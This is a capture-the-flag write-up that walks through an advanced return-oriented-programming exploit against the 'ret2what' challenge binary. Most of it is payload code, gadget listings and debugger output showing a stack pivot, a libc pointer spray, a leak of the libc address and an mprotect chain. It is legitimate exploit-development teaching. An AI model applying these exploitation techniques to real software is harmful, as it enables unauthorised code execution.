⍉ collection of ROP writeups

# recommended listening - at the drive in - enfilade

Over the past month or so I've done a few interesting stack challenges written by locals. They're all similar, so I've opted to group all the solutions into one post. All of the solutions I arrived at were unintended and significantly more painful and time consuming to execute than the typical routes, taking me upwards of a few hours to successfully pull off. These are not easy ROP solutions, and as such, these writeups are aimed at more advanced players who are already familiar with existing ROP techniques (such as add gadgets, stack pivoting, SROP, etcetera).

On some level I do believe approaching these challenges in this manner is an exercise in pain, not unlike that shit they did in the movie Martyrs. But much like Martyrs there is an eventual transcendent state acquired when a shell is popped, also. What I am trying to articulate here is that my life is, indeed, exactly like Martyrs, and the computer is a Pain Cube (a Cube of Pain for my Mind).

Anyways onto Pain Cube number one.


blahaj25: ret2what by FS

tldr if you hate me - spray libc addresses to get rbx control, use the add dword ptr [rbp - 0x3d], ebx gadget to increment stderr to stdout, use fprintf to leak libc, win
    int main()
    {
        char buf[0x100];
        char s[] = "Have you heard of 'Don't Tap the Glass'?\n";
        int n = 10;
        taunt();
        seccomp_();
        memset(s, (short)n, n);
        fgets(buf, 0x150, stdin);
        return 0;
    }
The vulnerability is immediate - the program reads 0x150 bytes into an 0x100 sized buffer allocated on the stack. However, the challenge is made more complicated by a host of random bullshit, the most meaningful ones being seccomp hardenings and some weird forking behavior in the taunt function:
    void taunt()
    {
        pid_t pid = fork();
        if (pid == 0)
        {
            execl("./test", "test", (char *)NULL);
            perror("execl failed");
        }
    }
The test program reads the flag into an mmap'd region of memory, waits until a specific byte in that region is changed, and then prints out the flag. Due to the seccomp hardenings which block any conventional shell-popping or ORW related syscalls, this child process is the only place we can read the flag.

Our plan of attack for this challenge, due to the lack of gadgets, is to spray a libc pointer into bss and increment it using an add gadget. Doing this requires a stack pivot - both techniques (add gadgets, pivoting) are common for this sort of challenge.

We can very easily get arbitrary write to anywhere in the binary due to two things: our ability to control rbp on each function epilogue, and the fact that fgets is always called on an address relative to rbp, as evidenced by the disassembly below.
  40149c:	48 8b 15 dd 2b 00 00 	mov    rdx,QWORD PTR [rip+0x2bdd]        # 404080 <stdin@GLIBC_2.2.5>
  4014a3:	48 8d 85 f0 fe ff ff 	lea    rax,[rbp-0x110]
  4014aa:	be 50 01 00 00       	mov    esi,0x150
  4014af:	48 89 c7             	mov    rdi,rax
  4014b2:	e8 c9 fb ff ff       	call   401080 <fgets@plt>
  4014b7:	b8 00 00 00 00       	mov    eax,0x0
  4014bc:	c9                   	leave
  4014bd:	c3                   	ret
A few simple calls will enable us to pivot into .bss and control rbp to write wherever we want.
    payload += p64(0x404500)  # saved rbp: the next fgets writes to 0x404500 - 0x110
    payload += p64(READ)      # return straight into the fgets call
    payload += p64(LEAVE)
    p.sendline(payload)

    payload = b'B' * 0x110
    payload += p64(0x404f60)  # saved rbp for the read after this one
    payload += p64(READ)
    time.sleep(0.1)
    p.sendline(payload)
(READ here is an address that points directly to the fgets call, after the function prologue).
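The rbp-relative write boils down to a little arithmetic. Below is a minimal sketch of it, assuming only what the disassembly shows (fgets writes to rbp - 0x110). The helper names are mine and not part of the actual exploit script, and p64 here is a stdlib stand-in for the pwntools function.

```python
import struct

BUF_OFFSET = 0x110  # fgets destination is [rbp - 0x110] per the disassembly


def p64(value: int) -> bytes:
    """Pack a 64-bit little-endian value (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value & 0xFFFFFFFFFFFFFFFF)


def rbp_for_write(target: int) -> int:
    """Saved-rbp value that makes the next fgets write start at `target`."""
    return target + BUF_OFFSET


def pivot_payload(fill: bytes, next_rbp: int, ret_addr: int) -> bytes:
    """0x110 filler bytes, then the saved rbp and the return address."""
    assert len(fill) == 1
    return fill * BUF_OFFSET + p64(next_rbp) + p64(ret_addr)


# With saved rbp = 0x404500, the next read lands at 0x404500 - 0x110.
print(hex(0x404500 - BUF_OFFSET))    # 0x4043f0
# To write at 0x404ce0, the saved rbp has to be 0x404ce0 + 0x110.
print(hex(rbp_for_write(0x404ce0)))  # 0x404df0
```

Every write in the rest of the chain follows this pattern: pick the target, add 0x110, and put that in the saved rbp slot of the previous write.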

The issue with our add gadget plan is that add gadgets require rbx control, which no existing gadget within the binary offers. Just to elucidate, we can peek at how useless the existing gadgets within the binary are with ROPgadget.
(base) wrenches@kitty (~/work/pwn/ret2what) > ROPgadget --binary=chall --nojop
Gadgets information
============================================================
0x00000000004013c8 : add al, ch ; ret 0xfffc
0x000000000040113b : add bh, bh ; loopne 0x4011a5 ; nop ; ret
0x00000000004013c6 : add byte ptr [rax], al ; add al, ch ; ret 0xfffc
0x00000000004014b8 : add byte ptr [rax], al ; add byte ptr [rax], al ; leave ; ret
0x0000000000401108 : add byte ptr [rax], al ; add byte ptr [rax], al ; nop dword ptr [rax] ; ret
0x00000000004014b9 : add byte ptr [rax], al ; add cl, cl ; ret
0x00000000004011aa : add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x00000000004014ba : add byte ptr [rax], al ; leave ; ret
0x000000000040110a : add byte ptr [rax], al ; nop dword ptr [rax] ; ret
0x00000000004011ab : add byte ptr [rcx], al ; pop rbp ; ret
0x00000000004011a9 : add byte ptr cs:[rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x00000000004014bb : add cl, cl ; ret
0x000000000040113a : add dil, dil ; loopne 0x4011a5 ; nop ; ret
0x00000000004011ac : add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x00000000004011a7 : add eax, 0x2efb ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x0000000000401013 : add esp, 8 ; ret
0x0000000000401012 : add rsp, 8 ; ret
0x0000000000401204 : leave ; ret
0x000000000040113d : loopne 0x4011a5 ; nop ; ret
0x00000000004011a6 : mov byte ptr [rip + 0x2efb], 1 ; pop rbp ; ret
0x00000000004014b7 : mov eax, 0 ; leave ; ret
0x0000000000401203 : nop ; leave ; ret
0x000000000040113f : nop ; ret
0x000000000040110c : nop dword ptr [rax] ; ret
0x00000000004011ad : pop rbp ; ret
0x0000000000401138 : push -0xffbfc0 ; loopne 0x4011a5 ; nop ; ret
0x0000000000401016 : ret
0x0000000000401042 : ret 0x2f
0x00000000004013ca : ret 0xfffc
0x0000000000401022 : retf 0x2f
0x0000000000401242 : retf 0xd
0x000000000040100d : sal byte ptr [rdx + rax - 1], 0xd0 ; add rsp, 8 ; ret
0x00000000004011a8 : sti ; add byte ptr cs:[rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x00000000004014c1 : sub esp, 8 ; add rsp, 8 ; ret
0x00000000004014c0 : sub rsp, 8 ; add rsp, 8 ; ret

Unique gadgets found: 35
Whole lot of nonsense. Only pop gadget is pop rbp, only useful gadget is our add gadget (add dword ptr [rbp - 0x3d], ebx ; nop ; ret). Honestly I am still surprised there is nothing of note here despite how much stuff the binary is doing, but oh well.
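For anyone who hasn't leaned on this gadget before, here is a small emulation of what add dword ptr [rbp - 0x3d], ebx does to a stored pointer. This is a sketch over a fake memory image, not exploit code. The concrete addresses are taken from the debugger output further down in this post (the stderr slot at 0x4040a0, rbx = 0xe0, and the stdout address from that run), and add_dword is a name I made up for illustration.

```python
import struct

MASK32 = 0xFFFFFFFF


def add_dword(mem: bytearray, base: int, rbp: int, ebx: int) -> None:
    """Emulate `add dword ptr [rbp - 0x3d], ebx` on a fake memory image."""
    off = (rbp - 0x3D) - base
    (old,) = struct.unpack_from("<I", mem, off)
    struct.pack_into("<I", mem, off, (old + ebx) & MASK32)


STDERR_SLOT = 0x4040A0            # stderr@GLIBC_2.2.5 in the binary
stdout_addr = 0x7FF0E79445C0      # _IO_2_1_stdout_ in one debugging run
stderr_addr = stdout_addr - 0xE0  # the stdout - stderr delta loaded into rbx

mem = bytearray(struct.pack("<Q", stderr_addr))  # the 8 bytes at STDERR_SLOT
add_dword(mem, STDERR_SLOT, rbp=STDERR_SLOT + 0x3D, ebx=0xE0)
(patched,) = struct.unpack("<Q", mem)
print(hex(patched))  # 0x7ff0e79445c0
```

Two things to keep in mind: rbp has to be the target address plus 0x3d, and the add only touches the low 32 bits, so it works when the source and destination pointers share their upper half (which two libc symbols normally do).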

Eventually, we find our gadget in an unlikely place - the seccomp_() call. Here is the full function code.
    void seccomp_()
    {
        int rc;
        scmp_filter_ctx ctx;
        char *boohoo = ":(";
        char *stra = "Load Failed %s\n";
        ctx = seccomp_init(SCMP_ACT_ALLOW);
        if (ctx == NULL)
        {
            perror("seccomp_init");
            exit(1);
        }

        int blocked_syscalls[] = {
            SCMP_SYS(pread64),
            SCMP_SYS(readv),
            SCMP_SYS(execve),
            SCMP_SYS(readlink),
            SCMP_SYS(readahead),
            SCMP_SYS(readlinkat),
            SCMP_SYS(preadv),
            SCMP_SYS(openat),
            SCMP_SYS(openat2),
            SCMP_SYS(open),
            SCMP_SYS(creat),
            SCMP_SYS(sendfile),
            SCMP_SYS(fork),
            SCMP_SYS(execveat),
            SCMP_SYS(sendfile),
            SCMP_SYS(preadv2),
        };

        for (size_t i = 0; i < sizeof(blocked_syscalls) / sizeof(blocked_syscalls[0]); i++)
        {
            rc = seccomp_rule_add(ctx, SCMP_ACT_KILL_PROCESS, blocked_syscalls[i], 0);
            if (rc < 0)
            {
                fprintf(stderr, "Failed to block syscall %d\n", blocked_syscalls[i]);
                seccomp_release(ctx);
                exit(1);
            }
        }
        rc = seccomp_load(ctx);
        if (rc < 0)
        {
            perror("seccomp_load");
            fprintf(stderr, stra, boohoo);
            seccomp_release(ctx);
            cleanUp();
        }

        seccomp_release(ctx);
    }
A brief aside. When exploiting difficult ROP problems of this nature, the exploit developer must, ultimately, stop looking outwards and instead focus his energy inwards. Perhaps five different tmux terminals, gdb instances, nvim split windows are running concurrently, and the exploit developer has devoted an equal amount of focus on each. This is the wrong approach.

At this juncture, a solution can only be attained by spiritual means. Focus yourself. Look inwards. Look into your heart. Is it pure? Are you kind of heart? Do the registers love you? Do you love yourself? If you have cleansed your soul in the water of God, only then will He answer. Only then will the registers command themselves to your touch, individual follicles winnowing along to His feather in a synchronous beat. Like knives through smoke.

Anyways, the wisdom of God makes itself apparent in the seccomp_release() function. The seccomp_release() function triggers a series of libc function calls which includes _int_free_merge_chunk and _int_free_create_chunk.
    0x7f5fc647444d e84ec70700            <_int_free_maybe_consolidate.part.0+0x46d>   call   0x7f5fc64f0ba0 <__stack_chk_fail>
    0x7f5fc6474452 66662e0f1f84000000..  <NO_SYMBOL>   data16 cs nop WORD PTR [rax+rax*1+0x0]
    0x7f5fc647445d 0f1f00                <NO_SYMBOL>   nop    DWORD PTR [rax]
*-> 0x7f5fc6474460 4156                  <_int_free_merge_chunk>   push   r14
    0x7f5fc6474462 4155                  <_int_free_merge_chunk+0x2>   push   r13
    0x7f5fc6474464 4c8d2c16              <_int_free_merge_chunk+0x4>   lea    r13, [rsi + rdx * 1]
    0x7f5fc6474468 4154                  <_int_free_merge_chunk+0x8>   push   r12
    0x7f5fc647446a 55                    <_int_free_merge_chunk+0xa>   push   rbp
    0x7f5fc647446b 53                    <_int_free_merge_chunk+0xb>   push   rbx
----------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:944135] Name: "chall_patched", stopped at 0x7f5fc6474460 <_int_free_merge_chunk>, reason: BREAKPOINT
------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x7f5fc6474460 <_int_free_merge_chunk>
[ #1] 0x7f5fc64746c6 <_int_free_chunk+0x126>
[ #2] 0x7f5fc64773c0 <free+0x180> (frame name: _int_free)
[ #3] 0x7f5fc64773c0 <free+0x180> (frame name: __GI___libc_free)
[ #4] 0x7f5fc65d3730 <NO_SYMBOL>
[ #5] 0x7f5fc65d3781 <NO_SYMBOL>
[ #6] 0x7f5fc65d37cd <NO_SYMBOL>
[ #7] 0x0000004013f0 <seccomp_+0x19f>
[ #8] 0x00000040147f <main+0x8c>
[ #9] 0x00000000000a <NO_SYMBOL>
[...]
------------------------------------------------------------------------------------------------------------------------------
gef> 
When _int_free_create_chunk is called from _int_free_merge_chunk, the call sits at a very specific offset near the function epilogue, so the return address it pushes onto the stack is one we can use as an rbx control gadget.
   0x7f5fc64744f3 <_int_free_merge_chunk+147>:	call   0x7f5fc6473040 <_int_free_create_chunk>
   0x7f5fc64744f8 <_int_free_merge_chunk+152>:	cmp    rax,0xffff
   0x7f5fc64744fe <_int_free_merge_chunk+158>:	ja     0x7f5fc6474510 <_int_free_merge_chunk+176>
   0x7f5fc6474500 <_int_free_merge_chunk+160>:	pop    rbx
   0x7f5fc6474501 <_int_free_merge_chunk+161>:	pop    rbp
   0x7f5fc6474502 <_int_free_merge_chunk+162>:	pop    r12
   0x7f5fc6474504 <_int_free_merge_chunk+164>:	pop    r13
   0x7f5fc6474506 <_int_free_merge_chunk+166>:	pop    r14
   0x7f5fc6474508 <_int_free_merge_chunk+168>:	ret
We can see that after calling main with our stack pivoted to .bss, this rbx control gadget (_int_free_merge_chunk+152) would be placed on the stack for us to freely return to. There is a cmp rax, 0xffff here but this is, thankfully, irrelevant. We can control our writes and write our needed values of rbx below the region of .bss where this return address happens to land, and then use a leave ; ret to pivot rsp on top of that gadget. Below is a list of all libc pointers sprayed onto .bss once we stack pivot and return to main:
chall_patched: 0x0000000000404208  ->  0x00007f5fc64760bc <_int_malloc+0xe1c>  ->  0xf7e3e908244c8b48
chall_patched: 0x0000000000404240  ->  0x00007f5fc65bbac0 <main_arena>  ->  0x0000000000000000
chall_patched: 0x00000000004042b8  ->  0x00007f5fc64773c0 <free+0x180>  ->  0x0000441f0f66d6eb
chall_patched: 0x0000000000404428  ->  0x00007f5fc65b9fd0 <_IO_file_jumps>  ->  0x0000000000000000
chall_patched: 0x0000000000404468  ->  0x00007f5fc6453947 <_IO_getline_info+0x127>  ->  0x048d490824448b4c
chall_patched: 0x00000000004044c8  ->  0x00007f5fc645270a <fgets+0x9a>  ->  0xc08548db3100558b
chall_patched: 0x0000000000404ca8  ->  0x00007f5fc64730cd <_int_free_create_chunk+0x8d>  ->  0xd801480824448b48
chall_patched: 0x0000000000404cd8  ->  0x00007f5fc64744f8 <_int_free_merge_chunk+0x98>  ->  0x10770000ffff3d48
chall_patched: 0x0000000000404d28  ->  0x00007f5fc64773c0 <free+0x180>  ->  0x0000441f0f66d6eb
Note our gadget of interest at 0x404cd8 in the binary. Yay!
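If you want to hunt for sprayed pointers like these without eyeballing a telescope dump, a scan over a memory dump does the job. This is a rough sketch: find_pointers is a hypothetical helper, and the libc range passed to it is an assumed mapping range chosen to cover the addresses in the listing above, not something read from the real process.

```python
import struct


def find_pointers(dump: bytes, dump_base: int, lo: int, hi: int):
    """Yield (address, value) for each aligned qword with lo <= value < hi."""
    for off in range(0, len(dump) - 7, 8):
        (value,) = struct.unpack_from("<Q", dump, off)
        if lo <= value < hi:
            yield dump_base + off, value


# Toy dump: three qwords starting at 0x404cd0, one of which is the gadget.
dump = struct.pack("<3Q", 0, 0x7F5FC64744F8, 0xC9202D3BCEDE358C)
# Assumed libc mapping range for this run (hypothetical bounds).
hits = list(find_pointers(dump, 0x404CD0, 0x7F5FC6400000, 0x7F5FC6600000))
for addr, value in hits:
    print(hex(addr), hex(value))  # 0x404cd8 0x7f5fc64744f8
```

In practice the dump would come from the debugger (for example a raw memory dump of the .bss page), and the bounds from the process memory map.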

We can view the region of memory below that saved return address. Right now it is full of garbage that we will eventually need to overwrite: if we used the gadget with these values in place, we would not only fill our registers with junk, but also return to a junk address.
      0x000000404cd8|+0x0008|+001: 0x00007fee59d3d4f8 <_int_free_merge_chunk+0x98>  ->  0x10770000ffff3d48
      0x000000404ce0|+0x0010|+002: 0xc9202d3bcede358c
      0x000000404ce8|+0x0018|+003: 0x000000000e548700  ->  0x0000000000000001
$rsp  0x000000404cf0|+0x0020|+004: 0x00007fee59e848e0 <_IO_2_1_stdin_>  ->  0x00000000fbad2088  <-  $r15
      0x000000404cf8|+0x0028|+005: 0x00007fee59d2c6ad <__syscall_cancel+0xd>  ->  0xf0003dd06348595a  <-  retaddr[1]
      0x000000404d00|+0x0030|+006: 0x0000000000000000
      0x000000404d08|+0x0038|+007: 0x000000000e54b540  ->  0x0000000000000000
      0x000000404d10|+0x0040|+008: 0xffffffffffffff88
      0x000000404d18|+0x0048|+009: 0x00007fee59da0ea6 <read+0x16>  ->  0x441f0fc318c48348  <-  retaddr[2]
      0x000000404d20|+0x0050|+010: 0x0000000000000000
Anyways, what do we do after we get rbx control? Typically, we just use rbx to increment some libc address to a one-gadget and win, but one-gadgets will not work due to seccomp. Indeed, the challenge requires us to eventually mprotect a RWX page and write some shellcode leveraging some arcane syscalls to leak the flag from the child process. This is practically impossible to do without help from our good buddy libc, so a libc leak should be our next target here.

seccomp_() once again comes to our rescue. There is a call to fprintf with stderr as an argument in a conditional branch. The challenge author's intended solution is to use ret2dlresolve to convert this call into an mprotect call, but the Mandate of Heaven is not awarded to people who use ret2dlresolve, so we can use another trick instead.

We first look at the C code, and the compiled assembly of this conditional branch.
    if (rc < 0)
    {
        perror("seccomp_load");
        fprintf(stderr, stra, boohoo);
        seccomp_release(ctx);
        cleanUp();
    }
Note that the fprintf call is invoked on two stack variables. The compiled assembly loads the address of stderr from an area within the binary, while also loading the other two variables from an address relative to rbp.
  4013af:	48 8b 05 ea 2c 00 00 	mov    rax,QWORD PTR [rip+0x2cea]        # 4040a0 <stderr@GLIBC_2.2.5>
  4013b6:	48 8b 55 f0          	mov    rdx,QWORD PTR [rbp-0x10]
  4013ba:	48 8b 4d e8          	mov    rcx,QWORD PTR [rbp-0x18]
  4013be:	48 89 ce             	mov    rsi,rcx
  4013c1:	48 89 c7             	mov    rdi,rax
  4013c4:	b8 00 00 00 00       	mov    eax,0x0
  4013c9:	e8 c2 fc ff ff       	call   401090 <fprintf@plt>
  4013ce:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
  4013d2:	48 89 c7             	mov    rdi,rax
  4013d5:	e8 86 fc ff ff       	call   401060 <seccomp_release@plt>
  4013da:	b8 00 00 00 00       	mov    eax,0x0
  4013df:	e8 e2 fd ff ff       	call   4011c6 <cleanUp>
  4013e4:	48 8b 45 e0          	mov    rax,QWORD PTR [rbp-0x20]
  4013e8:	48 89 c7             	mov    rdi,rax
  4013eb:	e8 70 fc ff ff       	call   401060 <seccomp_release@plt>
  4013f0:	90                   	nop
  4013f1:	c9                   	leave
  4013f2:	c3                   	ret
(Note, importantly, that the stderr stream is closed on remote.) We can leverage this fprintf call to get leaks. We simply point rbp towards some area that has a libc address (which we will have plenty of, because we will have sprayed .bss with libc return addresses by now), and use our add gadget with a controlled rbx to increment the stderr pointer stored in the binary so that it points to stdout instead.
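Since everything in that branch is read relative to rbp, it helps to write down which slot feeds which register. The sketch below just restates the offsets from the disassembly. fprintf_frame and its key names are mine, and 0x404330 is the rbp value used in the exploit script further down.

```python
def fprintf_frame(rbp: int) -> dict:
    """Addresses the seccomp_ error branch reads for a given rbp."""
    return {
        "ctx": rbp - 0x20,  # loaded into rdi for seccomp_release
        "fmt": rbp - 0x18,  # loaded into rsi: pointer to the format string
        "arg": rbp - 0x10,  # loaded into rdx: first variadic argument
    }


for name, addr in fprintf_frame(0x404330).items():
    print(f"{addr:#x}  {name}")
```

With rbp = 0x404330 this gives 0x404310 for the context pointer, 0x404318 for the format string pointer, and 0x404320 for the argument, which are exactly the slots the first write in the script fills in.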

Unfortunately, a lot of care is required here. The fact that all the functions within this snippet (including seccomp_release, which we have to ensure does not segfault) load stack-relative variables is both a gift and a curse: we can control them to whatever we want, but controlling them is quite fucking annoying. We can hijack one of our previous writes (by now, we will have done around like, four or so) filling the 0x100 sized buffer by preparing our needed stack variables.
    payload = b'E' * 0x110
    payload += p64(0x404ce0 + 0x110)
    payload += p64(READ)
    payload += p64(0) # 0x404310, [rbp - 0x20], null ptr for seccomp release
    payload += p64(0x404328) # [rbp - 0x18], ptr to string
    payload += p64(elf.sym['stderr'])
    payload += b'leak: %s'
    time.sleep(0.1)
    p.sendline(payload)

    print('[!] _int_free_merge_chunk gadget')
    payload = p64(libc.sym['_IO_2_1_stdout_'] - libc.sym['_IO_2_1_stderr_'])    # RBX
    payload += p64(elf.sym['stderr'] + 0x3d)
    payload += p64(12)  # R12
    payload += p64(13)  # R13
    payload += p64(14)  # R14
    payload += p64(ADD)
    payload += p64(POP_RBP) + p64(0x404310 + 0x20)
    payload += p64(FWRITE)
    payload += cyclic(0x110 - len(payload))
    payload += p64(0x404cd0) + p64(LEAVE)
    time.sleep(0.1)
    p.sendline(payload)
Note the weird 'juggling' we're doing with these two writes. The first write prepares our saved "stack" variables while also setting rbp and the saved return address so that the next read lands just below our saved _int_free_merge_chunk gadget for rbx control. The second write then fills in the values below that gadget: the whole chain executed after _int_free_merge_chunk (the popped registers, the add gadget that turns stderr into stdout, the rbp change, and eventually the fprintf call, which the script calls FWRITE). Additionally, within that same write, we overwrite that call's saved rbp to point just above our gadget for the leave ; ret.
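To make the geometry of that second write concrete, here is the frame laid out address by address. It is a sketch that reuses the constants visible in the gadget listing and the debugger output (0x404cd8 for the sprayed return address, 0x4011ac and 0x4011ad for the gadgets, 0xe0 for the stdout/stderr delta). The FWRITE address is left out because the post never states it.

```python
import struct


def p64(v: int) -> bytes:
    """Pack a 64-bit little-endian value (stand-in for pwntools' p64)."""
    return struct.pack("<Q", v & 0xFFFFFFFFFFFFFFFF)


GADGET_SLOT = 0x404CD8  # where the _int_free_merge_chunk+0x98 return address sits
ADD = 0x4011AC          # add dword ptr [rbp - 0x3d], ebx ; nop ; ret
POP_RBP = 0x4011AD      # pop rbp ; ret
STDERR_SLOT = 0x4040A0  # stderr@GLIBC_2.2.5

frame = [
    ("rbx", 0xE0),
    ("rbp", STDERR_SLOT + 0x3D),
    ("r12", 12), ("r13", 13), ("r14", 14),
    ("ret -> add gadget", ADD),
    ("ret -> pop rbp", POP_RBP),
    ("new rbp", 0x404330),
]
chain = b"".join(p64(v) for _, v in frame)

# leave ; ret with rbp = GADGET_SLOT - 8 pops a junk rbp and then returns
# into the libc gadget, leaving rsp on the qword right after GADGET_SLOT.
pivot_rbp = GADGET_SLOT - 8
frame_base = GADGET_SLOT + 8
for i, (name, v) in enumerate(frame):
    print(f"{frame_base + 8 * i:#x}: {v:#018x}  {name}")
```

The printed layout starts at 0x404ce0 and should line up with the stack dump in the next section, and pivot_rbp comes out as the 0x404cd0 used at the end of the second payload.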

We can carefully look at each step as it is executed.
$r15: 0x0000000000403df0 <__do_global_dtors_aux_fini_array_entry>  ->  0x0000000000401190 <__do_global_dtors_aux>  ->  0x2f0d3d80fa1e0ff3
$fs_base: 0x00007f7e5bdf0740  ->  [loop detected]
$gs_base: 0x0000000000000000
$eflags: 0x293 [ident align vx86 resume nested overflow direction INTERRUPT trap SIGN zero ADJUST parity CARRY] [Ring=3]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
-------------------------------------------------------------------------------------------------------------------------------------------------- stack ----
$rsp  0x000000404ce0|+0x0000|+000: 0x00000000000000e0
      0x000000404ce8|+0x0008|+001: 0x00000000004040dd  ->  0x0000000000000000
      0x000000404cf0|+0x0010|+002: 0x000000000000000c
      0x000000404cf8|+0x0018|+003: 0x000000000000000d
      0x000000404d00|+0x0020|+004: 0x000000000000000e
      0x000000404d08|+0x0028|+005: 0x00000000004011ac <__do_global_dtors_aux+0x1c>  ->  0x2e6666c390c35d01  <-  retaddr[1]
      0x000000404d10|+0x0030|+006: 0x00000000004011ad <__do_global_dtors_aux+0x1d>  ->  0x0f2e6666c390c35d  <-  retaddr[2]
      0x000000404d18|+0x0038|+007: 0x0000000000404330  ->  0x000000000040000a  ->  0x0000000000000000  <-  retaddr[3]
------------------------------------------------------------------------------------------------------------------------------ code: x86:64 (gdb-native) ----
    0x7f7e5be934f3 e848ebffff            <_int_free_merge_chunk+0x93>   call   0x7f7e5be92040 <_int_free_create_chunk>
    0x7f7e5be934f8 483dffff0000          <_int_free_merge_chunk+0x98>   cmp    rax, 0xffff
    0x7f7e5be934fe 7710                  <_int_free_merge_chunk+0x9e>   ja     0x7f7e5be93510 <_int_free_merge_chunk+176>
 -> 0x7f7e5be93500 5b                    <_int_free_merge_chunk+0xa0>   pop    rbx
    0x7f7e5be93501 5d                    <_int_free_merge_chunk+0xa1>   pop    rbp
    0x7f7e5be93502 415c                  <_int_free_merge_chunk+0xa2>   pop    r12
    0x7f7e5be93504 415d                  <_int_free_merge_chunk+0xa4>   pop    r13
    0x7f7e5be93506 415e                  <_int_free_merge_chunk+0xa6>   pop    r14
First, our hijacked _int_free_merge_chunk gadget. We can see all the prepared register values on the stack, as intended.
-------------------------------------------------------------------------------------------------------- code: x86:64 (gdb-native) ----
    0x7f7e5be93502 415c                  <_int_free_merge_chunk+0xa2>   pop    r12
    0x7f7e5be93504 415d                  <_int_free_merge_chunk+0xa4>   pop    r13
    0x7f7e5be93506 415e                  <_int_free_merge_chunk+0xa6>   pop    r14
 -> 0x7f7e5be93508 c3                    <_int_free_merge_chunk+0xa8>   ret   

   -> 0x4011ac 015dc3                <__do_global_dtors_aux+0x1c>   add    DWORD PTR [rbp - 0x3d], ebx
      0x4011af 90                    <__do_global_dtors_aux+0x1f>   nop   
      0x4011b0 c3                    <__do_global_dtors_aux+0x20>   ret   
      0x4011b1 66662e0f1f84000000..  <__do_global_dtors_aux+0x21>   data16 cs nop WORD PTR [rax + rax * 1 + 0x0]
      0x4011bc 0f1f4000              <__do_global_dtors_aux+0x2c>   nop    DWORD PTR [rax + 0x0]
      0x4011c0 f30f1efa              <frame_dummy>   endbr64

    0x7f7e5be93509 0f1f8000000000        <_int_free_merge_chunk+0xa9>   nop    DWORD PTR [rax + 0x0]
    0x7f7e5be93510 5b                    <_int_free_merge_chunk+0xb0>   pop    rbx
    0x7f7e5be93511 4889ef                <_int_free_merge_chunk+0xb1>   mov    rdi, rbp
    0x7f7e5be93514 5d                    <_int_free_merge_chunk+0xb4>   pop    rbp
    0x7f7e5be93515 415c                  <_int_free_merge_chunk+0xb5>   pop    r12
-------------------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:965899] Name: "chall_patched", stopped at 0x7f7e5be93508 <_int_free_merge_chunk+0xa8>, reason: SINGLE STEP
---------------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x7f7e5be93508 <_int_free_merge_chunk+0xa8>
[ #1] 0x0000004011ac <__do_global_dtors_aux+0x1c>
Then, our eventual return to the add gadget, which points stderr to stdout.
-------------------------------------------------------------------------------------------------------------- arguments (guessed) ----
0x401090 <fprintf@plt> (
   $rdi = 0x00007ff0e79445c0 <_IO_2_1_stdout_>  ->  0x00000000fbad2084,
   $rsi = 0x0000000000404328  ->  0x7325203a6b61656c 'leak: %s\n',
   $rdx = 0x00000000004040a0 <stderr@GLIBC_2.2.5>  ->  0x00007ff0e79445c0 <_IO_2_1_stdout_>  ->  0x00000000fbad2084,
   $rcx = 0x0000000000404328  ->  0x7325203a6b61656c 'leak: %s\n',
   $r8 = 0x00000000095c5f71  ->  0x4141414141414141 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[...]',
   $r9 = 0x0000000000000000,
)
-------------------------------------------------------------------------------------------------------------------------- threads ----
[*Thread Id:1, tid:973820] Name: "chall_patched", stopped at 0x0000004013c9 <seccomp_+0x178>, reason: SINGLE STEP
---------------------------------------------------------------------------------------------------------------------------- trace ----
[*#0] 0x0000004013c9 <seccomp_+0x178>
[ #1] 0x0000095c8530 <NO_SYMBOL>
[ #2] 0x000000000000 <NO_SYMBOL>
---------------------------------------------------------------------------------------------------------------------------------------
gef> 
And our eventual fprintf call, with our carefully prepared stack-relative variables. Yay!
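Turning the printed bytes back into a libc base is routine, but for completeness here is a sketch. parse_leak is a hypothetical helper, the simulated output uses the stdout address from the debugger view above, and STDOUT_OFFSET is a made-up placeholder: the real offset of _IO_2_1_stdout_ has to come from the libc shipped with the challenge.

```python
import struct


def parse_leak(output: bytes, marker: bytes = b"leak: ") -> int:
    """Recover the pointer that %s printed right after `marker`."""
    start = output.index(marker) + len(marker)
    raw = output[start:start + 6]  # user-space pointers: 6 significant bytes
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


# Simulated output for the stdout address seen in the debugger.
simulated = b"leak: " + struct.pack("<Q", 0x7FF0E79445C0)[:6] + b"\n"
leaked = parse_leak(simulated)
print(hex(leaked))  # 0x7ff0e79445c0

STDOUT_OFFSET = 0x2045C0  # hypothetical; look it up in the actual libc
print(hex(leaked - STDOUT_OFFSET))
```

One caveat: %s stops at the first NUL byte, so if any of the low six bytes of the pointer happen to be zero, the leak comes back truncated and the run needs to be retried.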

The final part of this challenge, once we get our leaks, is overcoming the utter nonsense that is the forked child process stuff. This is honestly better detailed in Nikola's writeup, and personally, I don't find it as interesting - it is functionally just writing shellcode after we get an mprotect call after our libc leak. With that in mind, I'm not going to go in depth (and this means the writeup will basically end here).

Let's just go over the mprotect section. We just need to prepare a simple ROP chain to call mprotect. A small complication is that we don't have enough space after the buffer to write our chain, so we just write it inside the buffer and then hijack RIP to point to a leave ; ret which puts us inside the buffer.
    payload = b'A' * 0x7
    payload += p64(POP_RDI) + p64(0x404000)
    payload += p64(POP_RDX_POP_RBX) + p64(0x07) + p64(0)
    payload += p64(POP_RSI) + p64(0x1000)
    payload += p64(libc.sym['__GI_mprotect'])
    payload += p64(POP_RBP) + p64(0x404800)
    payload += p64(READ)
    payload += b'A' * (0x10f - len(payload))
    payload += p64(0x404500 - 0x110)
    payload += p64(LEAVE)
    time.sleep(0.1)
    p.sendline(payload)
